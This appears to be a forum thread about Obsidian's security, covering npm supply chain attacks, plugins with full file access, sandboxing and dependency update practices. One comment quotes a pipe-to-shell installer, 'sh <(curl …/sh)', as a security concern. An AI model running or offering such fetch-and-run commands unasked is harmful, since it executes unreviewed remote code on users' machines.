The problem with supply chain attacks is specifically related to npm, and not related to JS. npm as an organization needs to be taking more responsibility for the recent attacks and essentially forcing everyone to use more strict security controls when publishing their dependencies.
It runs on a majority of computers and basically all phones. There will be many security issues that get discovered b y virtue of these facts.
What makes you think that "native" apps are any more secure?
It’s maybe a nit-pick, since most JS is run sandboxed, so it’s sort of equivalent. But it was explicitly what GP asked for. Would it be more accurate to say Electron is secure, not JS?
But as a developer this post is nonsense and extremely predictable [1]. We can expect countless others like it that explains how their use of these broken tools is different and just don't worry about it!
By their own linked Credits page there are 20 dependencies. Let's take one of those, electron, which itself has 3 dependencies according to npm. Picking one of those electron/get has 7 dependencies. One of those dependencies got, has 11 dependencies, one of those cacheable-request has 7 dependencies etc etc.
Now go back and pick another direct dependency of Obsidian and work your way down the dependency tree again. Does the Obsidian team review all these and who owns them? Do they trust each layer of the chain to pick up issues before it gets to them? Any one of these dependencies can be compromised. This is what it means to be. supply chain attack, you only have to quietly slip something into any one of these dependencies to have access to countless critical user data.
[1] https://drewdevault.com/2025/09/17/2025-09-17-An-impossible-...
Obsidian has a truly terrible security model for plugins. As I realized while building my own, Obsidian plugins have full, unrestricted access to all files in the vault.
Obsidian could've instead opted to be more 'batteries-included', at the cost of more development effort, but instead leaves this to the community, which in turn increases the attack surface significantly.
Or it could have a browser extension like manifest that declares all permissions used by the plugin, where attempting to access a permission that's not granted gets blocked.
Both of these approaches would've led to more real security to end users than "we have few third party dependencies".
And how exactly you can solve that?
I don't want to press 'allow access' on the every file some plugin is accessing.
IMO they should do something like aur on Arch Linux and have a community managed plugin repo and then a smaller, more vetted one. That would help with the plugin review time too.
If they wanted to, one would guess that browser-ish local apps based on stuff like Electron/node-webkit could probably figure out some way to limit extension permissions more granularly.
There is no reason for pdf.js to ever access anything other than the files you wish to export. The Export to PDF process could spawn a containerized subprocess with 0 filesystem or network access and constrained cpu and memory limits. Files could sent to the Export process over stdin, and the resulting PDF could be streamed back over stdout with stderr used for logging.
There are lots of plugin systems that work this way. I wish it were commodofied and universally available. AFAIK there's very little cross-platform tooling to help you solve this problem easily, and that's a pity.
FWIW, MacOS isn't any better or worse for security than any other desktop OS tbh....
I mean, MacOS just had it's "UAC" rollout not that long ago... and not sure about you, but I've encountered many times where someone had to hang up a Zoom or browser call because they updated the app or OS, and had to re-grant screenshare permissions or something. So, not that different. (Pre-"UAC" versions of MacOS didn't do any sandboxing when it came to user files / device access)
I’d love to try it, but speaking of security, this was the first thing I saw:
sh <(curl https://create.tauri.app/sh)
I would say VSCode has no excuse. It's based on a browser which does have capabilities to limit extensions. Huge miss on their part, and one that I wish drew more ire.
It's a great way to keep lifecycle costs down and devops QoL up, especially for smaller shops.
*Insert favorite distro here that backports security fixes to stable package versions for a long period of time.
Sneak in a malicious browser extension that breaks the permissions sandbox, and you have hundreds of thousands to millions of users as an attack surface.
Make a malicious VSCode/IDE extension and maybe you hit some hundreds or thousands of devs, a couple of smaller companies, and probably can get on some infosec blogs...
It's not a problem on pc, but an obsidian vault with thousands of notes can have a laggy startup on mobile, even if you disable plugins.
Users sidestep this issue with quick capture plugins and apps, but I wish there was a native stripped-down version of obsidian.
Code with publicly-known weaknesses poses exponentially more danger than code with unknown weaknesses.
It's like telling sysadmins to not waste time installing security patches because there are likely still vulnerabilities in the application. Great way to get n-day'd into a ransomware payment.
I'd also be forced to ask... what exactly are you doing with a markdown note-taking application such that performance is a legitimate concern?
But, I mean, maybe you're reading this in a Lynx session on your ThinkPad 701C.
While we're on the topic: what's your default markdown handler on Windows?
Any two Turing-complete programming languages are equally secure, no?
Surely the security can only ever come from whatever compiles/interprets it? You can run JavaScript on a piece of paper.
Maybe, just maybe, don't give fullmouthed advice on reducing risk in the supply chain.
If engineers can't even manage their own security, why are we expecting users to do so?
What a horribly disingenuous statement, for a product that isn't remotely usable without 3rd-party plugins. The "Obsidian" product would be more aptly named "Mass Data Exfiltration Facilitator Pro".
It is possible to make your same point without histrionic excess.
Conversely, barring a bug in the runtime or compiler, higher level languages don't enable those kinds of shenanigans.
See for example the heart bleed bug, where openssl would read memory it didn't own when given a properly malformed request.
If you use Wayland and it works for you, that's great, but it's not my experience.
This latest attack hit Crowdstrike as well. Imagine they had gotten inside Huntress, who opened up about how much they can abuse the access given: https://news.ycombinator.com/item?id=45183589
Security folks and companies think they are important. The C suite sees them as a scape goat WHEN the shit hits the fan and most end users feel the same about security as they do about taking off their shoes at the airport (what is this nonsense for) and they mostly arent wrong.
It's not that engineers cant take care of their own security. It's that we have made it a fight with an octopus rather than something that is seamless and second nature. Furthermore security and privacy go hand and hand... Teaching users that is not to the benefit of a large portion of our industry.
I dunno. My computer has at least 1 hardware backdoor that I know off, but that I just can't get hardware without any equivalent exploit.
My OS is developed with a set of tools that is known to make code revision about as hard as possible. Provides the bare minimum application insulation. And is 2 orders of magnitude larger than any single person can read on their lifetime. It's also the usable OS out there with best security guarantees, everything else is much worse or useless.
A browser is almost a new complete layer above the OS. And it's 10 times larger. Also written in a way that famously makes revisions impossible.
And then there are the applications, that is what everybody is focusing today. Keeping them secure is close to useless if one don't fix all of the above.
EDIT to add: Of course, reaching a state where the whole graph is free of CVEs is a fleeting state of affairs. Staying reasonably up-to-date and using only scanned dependencies is an ongoing process that takes more effort and attention to detail than many projects are willing or able to apply; but it is possible.
Language design actually has a lot of impact on security, because it defines what primitives you have available for interacting with the system. Do you have an arbitrary syscall primitive? Then the language is not going to help you write secure software. Is your only ability to interact with the system via capability objects that must be provided externally to authorize your access? Then you're probably using a language that put a lot of thought into security and will help out quite a lot.
Tauri is trustable (for some loose definition) and the pipe to shell is just a well known happy-path.
All that to say it's a low value smell test.
Also, I'm in the camp that would rather git clone and then docker up. My understanding is it gives me a littl more sandbox.
- All your data is just plain files on your file system. Automation and interop are great, including with tools like Claude Code.
- It’s local-first, so performance is good.
- It’s extensible. Write extensions in HTML, CSS, and JS.
- It’s free.
- Syncing files is straightforward. Use git, Syncthing, Google Drive, or pay for their cheap sync service which is quite good.
- Product development is thoughtful and well done.
- They’re explicitly not trying to lock you in or own your data. They define open specs and build on them when Markdown doesn’t cut it.
Things you might not like:
- Their collaboration story isn’t great yet. No collaborative editing.
- It’s an Electron app.
You can install Obsidian flatpak and lock it down with flatseal.
(IIUC, we actually were the first to get a certain certification for cloud deployment, maybe because we had a good handle on this and other factors.)
From the language-specific network package manager, I pulled the small number of third-party packages we used into the filesystem tree of system's repo, and audited each new version. And I disabled the network package manager in the development and deployment environments, to make it much harder for people to add in dependencies accidentally.
Dependencies outside this were either from the Linux distro (nice, because well-managed security updates), or go in the `vendor` or `ots` (off-the-shelf) trees of the repo (and are monitored for security updates).
Though, I look at some of the Python, JS, or Rust dependency explosions I sometimes see -- all dependent on being hooked up to the language's network package manager, with many people adding these cavalierly -- and it becomes a much harder problem.
I understand that not updating your dependencies when new patches are released reduces the chance of accidentally installing malware, but aren’t patches regularly released in order to improve security? Wouldn’t it generally be considered unwise to not install new patches?
Unless something has changed, it's worse than that. Plugins have unrestricted access to any file on your machine.
When I brought this up in discord a while back they brushed it aside.
pnpm has a setting that you can tell it that a package needs to be at least X minutes old in order to install it. I would wait at least 24 hours just to be safe
One thing that makes our offering unique is the ability to self-host your Relay Server so that your docs are completely private (we can't read them). At the same time you can use our global identity system / control plane to collaborate with anyone in the world.
We have pretty solid growth, a healthy paid consumer base (a lot of students and D&D/TTRPG), and starting to get more traction with businesses and enterprise.
[0] https://relay.md
I know it is not very different comparing to python or projects in any other language. But I don't feel that I cannot trust node/js community at this point.
But I haven't heard anyone talk like that in quite sometime (unless it's me parroting them). Which is quite unfortunate.
I think for example if someone from the old guard of Blizzard were to write a book or at least a novella that described how the plugin system for World of Warcraft functioned, particularly during the first ten years, where it broke, how they hardened it over time, and how the process worked of backporting features from plugins into the core library...
I think that would be a substantial net benefit to the greater software community.
Far too many ecosystems make ham-fisted, half-assed, hair-brained plugin systems. And the vast majority can be consistently described by at least two of the three.
Nobody has time to read source code, but there are many tools and services that will tell you brief summaries of release notes. Npm Audit lists security vulnerabilities in your package versions for example.
I do adopt the strategy of not updating unless required, as updates are not only an attack vector, but also an extremely common source of bugs that'd I'd prefer to avoid.
But importantly I stay in the loop about what exploits I'm vulnerable to. Packages are popping up with vulnerabilities constantly, but if it's a ReDoS vulnerability in part of the package I definitely don't use or pass user input to? I'm happy to leave that alone with a notice. If it's something I'm worried another package might use unsafely, with knowledge of the vulnerability I can decide how important it is, and if I need to update immediately, or if I can (preferably) wait some time for the patch to cook in the wild.
That is the important thing to remember about security in this context: it is an active, continuous, process. It's something that needs to be tuned to the risk tolerance and risk appetite of your organisation, rather than a blanket "never update" or "always update" - for a well-formed security stance, one needs more information than that.
I get the intent, but I’m not sure this really buys much. If a package is compromised, the whole thing is already untrustworthy and skipping postinstall doesn’t suddenly make the rest of the code safe. If it isn’t compromised, then you risk breaking legitimate installation steps.
From a security perspective, it feels like an odd tradeoff. I don’t have hard data, but I’d wager we see far more vulnerabilities patched through regular updates than actual supply-chain compromises. Delaying or blocking updates in general tends to increase your exposure rather than reduce it.
It's pretty much the opposite. A lot of modding communities' security model is literally just to "trust the community."
Example: https://skylines.paradoxwikis.com/Modding_API
> The code in Mods for Cities: Skylines is not executed in a sandbox.
> While we trust the gaming community to know how to behave and not upload malicious mods that will intentionally cause damage to users, what is uploaded on the Workshop cannot be controlled.
> Like with any files acquired from the internet, caution is recommended when something looks very suspicious.
You could do it with namespaces.
I think node/whatever-js-run-time/package-manger could allow for namespaced containment for packages with simple modern linux things.
The realms proposal was a step towards that at one time.
Let's fix private key leakage and supply chain issues before worrying about C++ haxxors p0wning your machines.
The derivatives are obviously completely separate from Arch and thus are not the responsibility of Arch maintainers.
The lessons from all fields seem to be relearnt again and again in new fields :-)
The Emily language (locked-down subset of OCaml) was also interesting for actively removing parts of the standard library to get rid of the escape hatches that would enable bypassing the controls.
It might be slightly sped up by reading up on theory and past experiences of others.
I am around mid life and I see how I can tell people stuff, I can point people to resources but they still won’t learn until they hit the problem themselves and put their mind into figuring it out.
It’s still the same problem, relying on the community and trusted popular plugin developers to maintain their own security effectively.
This isn't trivial to organise though since semver by it's self doesn't denote when a patch is security related or not. Of course, you can always review the release notes but this is time consuming, and doesn't scale well when a product grows either in size of code base or community support.
This is where there's a fairly natural place for SAST (E.g., Semgrep, Snyk (many more but these are the two I've used the most, in no particular order)), and supply chain scans fall in place, but they're prohibitively expensive.
There is a lot of open source tooling out there that can achieve the same too of course.
I've found there's a considerable linear climb with overheads/TOIL and the larger the number of open source tools you commit to create a security baseline. Unfortunately, this realistically means most companies where time is scarcer than money, means more money shifts into closed source products like those I listed, rather than those ran by open source products/companies.
There are so many options, from so many different security perspectives, that analysis paralysis is a real issue.
To be fair, a plugin system built on JS with all plugins interacting in the same JS context as the main app has some big risks. Anything plugin can change definitions and variable in the global scope with some restrictions. But any language where you execute untrusted code in the same context/memory/etc as trusted code has risks. the only solution is sandboxing plugins
And in general, it will take less hardware resources that the usual Electron stuff.
yay or paru (or other aur helpers afaik) are not in the repos. To install them one needs to know about how to use AUR in the first place. If you are technically enough to do that, you should know about the security risks since almost all tutorials for AUR come with the security warnings. Its also inconvenient enough that most people wont bother.
In obsidian plugins can seem central to the experience so users might not think much of installing them, in Arch AUR is very much a non essential component. At least thats how I understand it.
While somewhat true, we are talking about a user who has installed Arch on their machine. If a user wanted to not bother with installation details, they would've installed Ubuntu.
I just decided on Thursday after years of covering my ears and eyes from my obsidian-obsessed friends and coworkers that the tool just didn’t make sense to me, and I felt like I’d be in plugin purgatory on my computer for eternity.
I’ve ended up going with Reflect, after ~forever using Apple Notes primarily. So far so good, but I genuinely felt for so long I was supposed to love Obsidian because that’s the trope - appears that’s changing.
It's literally at least 100 times more expensive that Dropbox/OneDrive/Google Drive/iCloud sync
With all of the latest in automated scanning and whatnot, this is more or less a moot point. You'll know when a package is vulnerable, and the alarm bells are loud and unambiguous. I really agree, and have always pushed the point, that version ranges are the worst things you can have if you care about supply chain attacks.